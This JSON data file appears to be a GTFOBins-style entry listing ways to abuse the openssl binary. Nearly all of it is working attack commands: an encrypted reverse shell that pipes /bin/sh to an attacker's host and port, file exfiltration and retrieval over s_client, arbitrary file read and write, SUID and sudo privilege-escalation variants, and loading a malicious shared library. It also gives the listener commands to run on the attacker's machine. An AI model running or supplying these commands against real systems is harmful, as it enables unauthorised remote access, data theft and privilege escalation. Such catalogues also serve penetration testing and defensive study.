{
  "functions": {
    "reverse-shell": [
      {
        "description": "To receive the shell run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port]\n\nCommunication between attacker and target will be encrypted.",
        "code": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect [host]:[port] > /tmp/s; rm /tmp/s\n"
      }
    ],
    "file-upload": [
      {
        "description": "To collect the file run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port] > [file]\n\nSend a local file via TCP. Transmission will be encrypted.",
        "code": "openssl s_client -quiet -connect [host]:[port] < [file]\n"
      }
    ],
    "file-download": [
      {
        "description": "To send the file run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port] < [file]\n\nFetch a file from a TCP port, transmission will be encrypted.",
        "code": "openssl s_client -quiet -connect [host]:[port] > [file]\n"
      }
    ],
    "file-write": [
      {
        "code": "echo DATA | openssl enc -out [file]\n"
      },
      {
        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\nopenssl enc -in $TF -out [file]\n"
      }
    ],
    "file-read": [
      {
        "code": "openssl enc -in [file]\n"
      }
    ],
    "suid": [
      {
        "description": "To receive the shell run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port]\n\nCommunication between attacker and target will be encrypted.",
        "code": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -connect [host]:[port] > /tmp/s; rm /tmp/s\n"
      },
      {
        "code": "echo DATA | openssl enc -out [file]\n"
      }
    ],
    "sudo": [
      {
        "description": "To receive the shell run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port]\n\nCommunication between attacker and target will be encrypted.",
        "code": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect [host]:[port] > /tmp/s; rm /tmp/s\n"
      }
    ],
    "library-load": [
      {
        "code": "openssl req -engine ./lib.so"
      }
    ]
  }
}